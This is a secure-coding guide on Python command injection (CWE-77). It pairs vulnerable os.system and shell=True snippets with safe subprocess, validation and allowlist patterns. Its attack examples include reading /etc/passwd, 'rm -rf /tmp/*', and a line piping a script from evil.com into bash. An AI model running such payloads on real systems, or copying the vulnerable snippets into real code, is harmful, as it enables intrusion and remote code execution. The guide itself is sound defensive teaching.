
CWE-77: Command Injection - Python

Overview

Command injection in Python occurs when applications construct system commands using untrusted input. Python's subprocess and os modules can invoke shells, allowing attackers to inject malicious commands.

Primary Defense: Use subprocess.run() or subprocess.Popen() with an argument list (shell=False, the default) instead of a shell string. Never pass untrusted input to os.system(), os.popen(), or any subprocess call with shell=True. Validate all user input against a strict allowlist before it reaches a command, and prefer Python libraries over shelling out for tasks such as file handling, HTTP requests, and archiving.

Common Vulnerable Patterns

os.system() with User Input

# VULNERABLE - Always uses shell
import os

ip_address = request.GET.get('ip')
os.system('ping -c 4 ' + ip_address)

# Attack: ip=8.8.8.8; cat /etc/passwd
# Executes: ping -c 4 8.8.8.8; cat /etc/passwd

subprocess with shell=True

# VULNERABLE - Shell interpretation enabled
import subprocess

filename = request.POST.get('file')
subprocess.call('ls -la ' + filename, shell=True)

# Attack: file=test.txt && rm -rf /tmp/*
# Executes: ls -la test.txt && rm -rf /tmp/*

os.popen() with Concatenation

# VULNERABLE - Uses shell automatically
import os

domain = request.args.get('domain')
result = os.popen('nslookup ' + domain).read()

# Attack: domain=example.com || whoami
# Executes: nslookup example.com || whoami

String Formatting in Commands

# VULNERABLE - f-string in shell command
import subprocess

host = request.json.get('host')
subprocess.run(f'ping -c 4 {host}', shell=True)

# Attack: host=8.8.8.8; curl http://evil.com/shell.sh | bash

Secure Patterns

Use Python Native Libraries (Primary Defense)

# SECURE - Use Python libraries instead of system commands

# Instead of: os.system('nslookup ' + host)
import re
import socket

def is_host_resolvable(hostname):
    """Check that a hostname resolves via DNS (no ICMP ping is sent)"""
    # Validate hostname: ASCII letters, digits, dots and hyphens only
    if not re.fullmatch(r'[a-zA-Z0-9.-]+', hostname):
        raise ValueError("Invalid hostname")

    try:
        socket.gethostbyname(hostname)
        return True
    except (OSError, UnicodeError):
        # OSError covers socket.gaierror; UnicodeError covers malformed labels
        return False

# Instead of: os.system('rm ' + file)
import os
import re

def delete_file(filename):
    """Delete file using Python's os module"""
    # Validate filename; fullmatch() rejects a trailing newline, and '.'/'..' are not files
    if filename in ('.', '..') or not re.fullmatch(r'[a-zA-Z0-9_.-]+', filename):
        raise ValueError("Invalid filename")

    filepath = os.path.join('/safe/directory', filename)
    os.remove(filepath)

# Instead of: subprocess.call('curl ' + url, shell=True)
import requests

def fetch_url(url):
    """Fetch URL using requests library"""
    response = requests.get(url, timeout=10)
    return response.text

# Instead of: os.system('tar -czf archive.tar.gz ' + files)
import tarfile

def create_archive(file_list, archive_name):
    """Create tar archive using tarfile module"""
    with tarfile.open(archive_name, 'w:gz') as tar:
        for file in file_list:
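            # Validate each filename; reject absolute paths and '..' segments
            if (not re.fullmatch(r'[a-zA-Z0-9_./-]+', file)
                    or file.startswith('/') or '..' in file.split('/')):
                raise ValueError(f"Invalid filename: {file}")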
            tar.add(file)

Why this works:

  • Native libraries eliminate shell: socket.gethostbyname() uses system resolvers (not nslookup), os.remove() uses syscalls (not rm), requests.get() uses sockets (not curl), tarfile.open() uses zlib (not tar)
  • Removes attack surface: No shell interpretation means metacharacters (;, &, |, backticks, $(), newlines) have no special meaning
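  • Defense-in-depth validation: Allowlist regexes such as ^[a-zA-Z0-9_.-]+$ reject command separators and path separators (/, \) even though native libraries don't interpret them; a bare .. still matches the pattern, so it needs its own check
  • Path safety: os.path.join() only concatenates and does not sanitize. An absolute component (/etc/passwd) replaces the trusted base entirely, and traversal segments (../../etc/shadow) are kept as-is, so the filename allowlist (no / or \) is what keeps the joined path inside /safe/directory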
  • Standard library advantages: Maintained, cross-platform, auditable modules avoid inconsistent shell escaping (bash/sh/dash/zsh) and OS-specific command syntax
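The path-safety point can be checked directly. The following is a minimal sketch, assuming POSIX-style paths; `resolve_inside` is a hypothetical helper name, not part of the original examples. It shows what `os.path.join()` does with hostile input and one way to enforce containment with `os.path.realpath()` and `os.path.commonpath()`.

```python
import os

BASE_DIR = '/safe/directory'  # same trusted base as in the example above

# An absolute component discards everything before it
print(os.path.join(BASE_DIR, '/etc/passwd'))   # /etc/passwd
# '..' is kept verbatim; join() performs no normalization
print(os.path.join(BASE_DIR, '..'))            # /safe/directory/..

def resolve_inside(base_dir, filename):
    """Hypothetical helper: return the real path, or raise if it escapes base_dir."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, filename))
    # commonpath() equals base only when candidate is base or lies beneath it
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("Path escapes the safe directory")
    return candidate
```

A containment check like this complements the filename allowlist rather than replacing it: the regex rejects obviously hostile names early, and the resolved-path comparison also catches symlinks that point outside the base directory.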

subprocess.run() with List Arguments

# SECURE - Use list form, shell=False (default)
import subprocess
import re

def secure_ping(ip_address):
    """Execute ping with argument list"""
    # Validate IP address
    ip_pattern = r'^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}' \
                 r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'
    if not re.fullmatch(ip_pattern, ip_address):  # fullmatch() also rejects a trailing newline
        raise ValueError("Invalid IP address")

    # Use list form - no shell interpretation
    result = subprocess.run(
        ['ping', '-c', '4', ip_address],
        capture_output=True,
        text=True,
        timeout=10
    )
    return result.stdout

def secure_nslookup(domain):
    """Execute nslookup with argument list"""
    # Validate domain name; a leading '-' would be parsed by nslookup as an option
    if domain.startswith('-') or not re.fullmatch(r'[a-zA-Z0-9.-]+', domain):
        raise ValueError("Invalid domain name")

    # Arguments as list, shell=False
    result = subprocess.run(
        ['nslookup', domain],
        capture_output=True,
        text=True,
        timeout=5
    )
    return result.stdout

Why this works:

  • subprocess.run() with list bypasses shell: Arguments passed as distinct elements, not shell script
  • shell=False prevents shell invocation: Direct fork()/exec() (Linux) or CreateProcess() (Windows)
  • Metacharacters become literal data: ;, &, |, $(), backticks passed as strings, not interpreted
  • Strict validation blocks injection attempts: IP/domain regex ensures only valid input passes
  • capture_output=True avoids shell redirection: Clean stdout/stderr capture without >, 2>&1
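  • Timeout prevents DoS: timeout=10 (ping) and timeout=5 (nslookup) make subprocess.run() kill the child process and raise subprocess.TimeoutExpired rather than hang on a slow or unresponsive lookup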
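The claim that metacharacters become literal data can be demonstrated without touching the network. This sketch is an illustration only: it uses the current Python interpreter (`sys.executable`) as a stand-in for `ping`, and the payload string is made up for the demonstration.

```python
import subprocess
import sys

payload = '8.8.8.8; echo INJECTED'

# The child process simply prints the one argument it receives.
# No shell is involved, so ';' is never treated as a command separator.
result = subprocess.run(
    [sys.executable, '-c', 'import sys; print(sys.argv[1])', payload],
    capture_output=True,
    text=True,
    timeout=10,
)

print(repr(result.stdout))
```

The child sees the whole payload as a single argument, including the semicolon. A real `ping` would reject it as an invalid host rather than run a second command.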

Input Validation with Regex

# SECURE - Strict allowlist validation
import re

class InputValidator:
    """Validate user inputs against allowlists"""

    HOSTNAME_PATTERN = re.compile(r'^[a-zA-Z0-9.-]+$')
    IP_PATTERN = re.compile(
        r'^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}'
        r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'
    )
    FILENAME_PATTERN = re.compile(r'^[a-zA-Z0-9_.-]+$')
    NUMBER_PATTERN = re.compile(r'^[0-9]+$')

    @staticmethod
    def validate_hostname(hostname):
        if not hostname or len(hostname) > 253:
            raise ValueError("Invalid hostname length")
        # A leading '-' would be parsed as an option by tools such as nslookup
        if hostname.startswith('-'):
            raise ValueError("Invalid hostname format")
        # fullmatch(): with match(), '$' would still accept a trailing newline
        if not InputValidator.HOSTNAME_PATTERN.fullmatch(hostname):
            raise ValueError("Invalid hostname format")
        return hostname

    @staticmethod
    def validate_ip(ip_address):
        if not InputValidator.IP_PATTERN.fullmatch(ip_address):
            raise ValueError("Invalid IP address format")
        return ip_address

    @staticmethod
    def validate_filename(filename):
        if not filename:
            raise ValueError("Empty filename")
        if '..' in filename or '/' in filename or '\\' in filename:
            raise ValueError("Path traversal attempt detected")
        if not InputValidator.FILENAME_PATTERN.fullmatch(filename):
            raise ValueError("Invalid filename format")
        return filename

    @staticmethod
    def validate_number(value):
        if not InputValidator.NUMBER_PATTERN.fullmatch(str(value)):
            raise ValueError("Invalid number format")
        return int(value)

Why this works:

  • Centralized validation: Precompiled re.compile() patterns (thread-safe, performant) keep validation consistent, so every code path enforces the same strict rules
  • Allowlist regex: [a-zA-Z0-9.-]+ permits only safe characters, so shell metacharacters (;, &, |, >, <, backticks, $(), newlines, null bytes) are rejected; note that re.match() with a trailing $ still accepts one final newline, which re.fullmatch() does not
  • Specific checks: IP validation (precise IPv4 octets 0-255), path traversal detection ('..', /, \\), length limits (≤253 per RFC 1035) prevent injections and DoS
  • Fail-closed exceptions: raise ValueError for invalid input rejects suspicious data rather than sanitizing (error-prone); int() conversion ensures type safety
  • Defense-in-depth: Complements list-based subprocess - validation catches malicious input before command execution even if subprocess used correctly
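One detail of anchored patterns is easy to miss: in Python, `$` also matches just before a trailing newline. The sketch below shows the difference between `match()` and `fullmatch()`. It also shows the standard library's `ipaddress` module as an alternative to a hand-written IPv4 regex. `parse_ipv4` is a hypothetical helper name used only for this illustration.

```python
import ipaddress
import re

HOSTNAME = re.compile(r'^[a-zA-Z0-9.-]+$')

candidate = 'example.com\n'
print(bool(HOSTNAME.match(candidate)))      # True: '$' tolerates one trailing newline
print(bool(HOSTNAME.fullmatch(candidate)))  # False: the entire string must match

def parse_ipv4(value):
    """Hypothetical helper: validate an IPv4 string with the standard library."""
    if not isinstance(value, str):
        raise ValueError("Invalid IP address format")
    try:
        return str(ipaddress.IPv4Address(value))
    except ipaddress.AddressValueError:
        raise ValueError("Invalid IP address format") from None
```

With list-based subprocess calls a trailing newline is not an injection by itself. Rejecting it still keeps the validator's behavior aligned with what the allowlist claims to permit.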

Safe Subprocess Execution Pattern

# SECURE - Complete safe execution pattern
import subprocess
from pathlib import Path

def execute_command_safely(command, args):
    """
    Execute command with strict safety controls

    Args:
        command: Command name (validated against allowlist)
        args: List of arguments (not validated here; the caller must validate each one)
    """
    # Allowlist of permitted commands
    ALLOWED_COMMANDS = {
        'ping': '/bin/ping',
        'nslookup': '/usr/bin/nslookup',
        'dig': '/usr/bin/dig'
    }

    if command not in ALLOWED_COMMANDS:
        raise ValueError(f"Command not allowed: {command}")

    # Build command with full path
    cmd_list = [ALLOWED_COMMANDS[command]] + args

    # Execute without shell
    try:
        result = subprocess.run(
            cmd_list,
            capture_output=True,
            text=True,
            timeout=30,
            check=False,  # Don't raise on non-zero exit
            shell=False   # CRITICAL: Never use shell
        )
        return result.stdout
    except subprocess.TimeoutExpired:
        raise RuntimeError("Command timed out")
    except Exception as e:
        raise RuntimeError(f"Command execution failed: {e}")

Why this works:

  • Command allowlist: ALLOWED_COMMANDS dictionary with absolute paths (/bin/ping, /usr/bin/nslookup) prevents PATH manipulation and arbitrary command execution
  • List-based arguments: cmd_list = [ALLOWED_COMMANDS[command]] + args passes each arg separately - no shell interpretation, quoting, or escaping needed
  • Direct execution: shell=False invokes executables directly via fork()/exec(), not through /bin/sh -c; capture_output=True captures stdout/stderr without redirection
  • DoS prevention: timeout=30 prevents hangs from unresponsive hosts; check=False allows graceful handling of non-zero exit codes
  • Defense-in-depth wrapper: Combines allowlisting, argument isolation, timeouts, and clean error messages in reusable function
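Argument isolation stops shell injection, but a value that begins with `-` can still be read by the target program as an option (argument injection). The following is a minimal sketch of a per-argument check that could run before `execute_command_safely`. `validate_args` and `SAFE_ARG` are hypothetical names, and the character set is an assumption suited to hostnames and IP addresses only.

```python
import re

# Assumption: user-supplied arguments are hostnames or IP addresses
SAFE_ARG = re.compile(r'[a-zA-Z0-9.:_-]+')

def validate_args(args):
    """Hypothetical helper: allowlist each argument and reject option-like values."""
    checked = []
    for arg in args:
        if not isinstance(arg, str) or not SAFE_ARG.fullmatch(arg):
            raise ValueError(f"Invalid argument: {arg!r}")
        if arg.startswith('-'):
            raise ValueError(f"Option-like argument rejected: {arg!r}")
        checked.append(arg)
    return checked
```

A call might then look like `execute_command_safely('nslookup', validate_args([domain]))`. Fixed options such as `-c 4` for ping would be added by trusted code after validation, never taken from user input.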

Common Python Command Injection Scenarios

File Operations

# VULNERABLE
import os
filename = request.POST.get('file')
os.system(f'cat {filename}')

# SECURE - Use built-in file operations
from pathlib import Path
def read_file_safely(filename):
    # Validate filename
    filename = InputValidator.validate_filename(filename)

    # Use Path for safe file operations
    safe_dir = Path('/safe/directory')
    file_path = safe_dir / filename

    # Ensure file is within safe directory (Path.is_relative_to requires Python 3.9+)
    if not file_path.resolve().is_relative_to(safe_dir.resolve()):
        raise ValueError("Path traversal attempt")

    with open(file_path, 'r') as f:
        return f.read()

Network Operations

# VULNERABLE
import os
host = request.args.get('host')
os.system(f'curl https://{host}/api/data')

# SECURE - Use requests library
import requests

def fetch_api_data(hostname):
    # Validate hostname
    hostname = InputValidator.validate_hostname(hostname)

    # Use requests library
    url = f'https://{hostname}/api/data'
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    return response.json()

Image Processing

# VULNERABLE
import os
image_file = request.FILES.get('image').name
os.system(f'convert {image_file} thumbnail.jpg')

# SECURE - Use Pillow library
from PIL import Image

def create_thumbnail(image_path):
    # Validate filename
    filename = InputValidator.validate_filename(image_path)

    # Use Pillow instead of ImageMagick command
    with Image.open(filename) as img:
        img.thumbnail((128, 128))
        # JPEG has no alpha channel; convert so RGBA or palette images save cleanly
        img.convert('RGB').save('thumbnail.jpg')

Archive Creation

# VULNERABLE
import os
files = request.POST.get('files')
os.system(f'zip archive.zip {files}')

# SECURE - Use zipfile module
import zipfile

def create_zip_archive(file_list):
    with zipfile.ZipFile('archive.zip', 'w') as zipf:
        for file in file_list:
            # Validate each filename
            safe_name = InputValidator.validate_filename(file)
            zipf.write(safe_name)

Django-Specific Guidance

# Django view with command injection vulnerability
from django.http import HttpResponse
import subprocess

def vulnerable_view(request):
    # VULNERABLE
    domain = request.GET.get('domain', '')
    result = subprocess.check_output(f'nslookup {domain}', shell=True)
    return HttpResponse(result)

# SECURE Django view
from django.http import HttpResponse, HttpResponseBadRequest
import subprocess

def secure_view(request):
    domain = request.GET.get('domain', '')

    # Validate input
    try:
        domain = InputValidator.validate_hostname(domain)
    except ValueError as e:
        return HttpResponseBadRequest(str(e))

    # Use list form, no shell
    try:
        result = subprocess.run(
            ['nslookup', domain],
            capture_output=True,
            text=True,
            timeout=5
        )
        return HttpResponse(result.stdout)
    except subprocess.TimeoutExpired:
        return HttpResponseBadRequest("Request timeout")

Flask-Specific Guidance

# Flask route with command injection vulnerability
from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/ping')
def vulnerable_ping():
    # VULNERABLE
    ip = request.args.get('ip')
    result = os.popen(f'ping -c 4 {ip}').read()
    return result

# SECURE Flask route
from flask import Flask, request, abort
import subprocess

@app.route('/ping')
def secure_ping():
    ip = request.args.get('ip', '')

    # Validate IP address
    try:
        ip = InputValidator.validate_ip(ip)
    except ValueError:
        abort(400, "Invalid IP address")

    # Use subprocess with list arguments
    try:
        result = subprocess.run(
            ['ping', '-c', '4', ip],
            capture_output=True,
            text=True,
            timeout=10
        )
        return result.stdout
    except subprocess.TimeoutExpired:
        abort(504, "Request timeout")

Verification

After implementing the recommended secure patterns, verify the fix through multiple approaches:

  • Manual testing: Submit command injection payloads (for example 8.8.8.8; id, $(id), `id`, and input starting with -) and confirm they are rejected or treated as literal data without executing unintended operations
  • Code review: Confirm every command invocation uses an argument list with shell=False, and that no os.system(), os.popen(), or shell=True call receives concatenated or formatted user input
  • Static analysis: Use security scanners to verify no new vulnerabilities exist and the original finding is resolved
  • Regression testing: Ensure legitimate user inputs and application workflows continue to function correctly
  • Edge case validation: Test with special characters, boundary conditions, and unusual inputs to verify proper handling
  • Framework verification: If using a framework or library, confirm the recommended APIs are used correctly according to documentation
  • Authentication/session testing: Verify security controls remain effective and cannot be bypassed (if applicable to the vulnerability type)
  • Rescan: Run the security scanner again to confirm the finding is resolved and no new issues were introduced
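The manual and regression checks above can be captured as automated tests. This is a sketch under stated assumptions: `is_valid_hostname` is a stand-in for the application's real validator, and the payload list reuses the attack strings shown earlier plus a few common variants. The functions follow pytest naming conventions but can also be called directly.

```python
import re

HOSTNAME_PATTERN = re.compile(r'[a-zA-Z0-9.-]+')  # mirrors the hostname allowlist

def is_valid_hostname(value):
    """Stand-in for the application's real validator (hypothetical)."""
    return (
        isinstance(value, str)
        and 0 < len(value) <= 253
        and not value.startswith('-')
        and HOSTNAME_PATTERN.fullmatch(value) is not None
    )

INJECTION_PAYLOADS = [
    '8.8.8.8; cat /etc/passwd',
    'test.txt && rm -rf /tmp/*',
    'example.com || whoami',
    '$(id)',
    '`id`',
    'example.com\nwhoami',
    '-version',
]

def test_payloads_are_rejected():
    for payload in INJECTION_PAYLOADS:
        assert not is_valid_hostname(payload), payload

def test_legitimate_input_is_accepted():
    for value in ['example.com', 'sub.example-host.org', '8.8.8.8']:
        assert is_valid_hostname(value), value
```

Keeping the payload list in version control lets later changes to the validator be re-checked against the same inputs.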

Additional Resources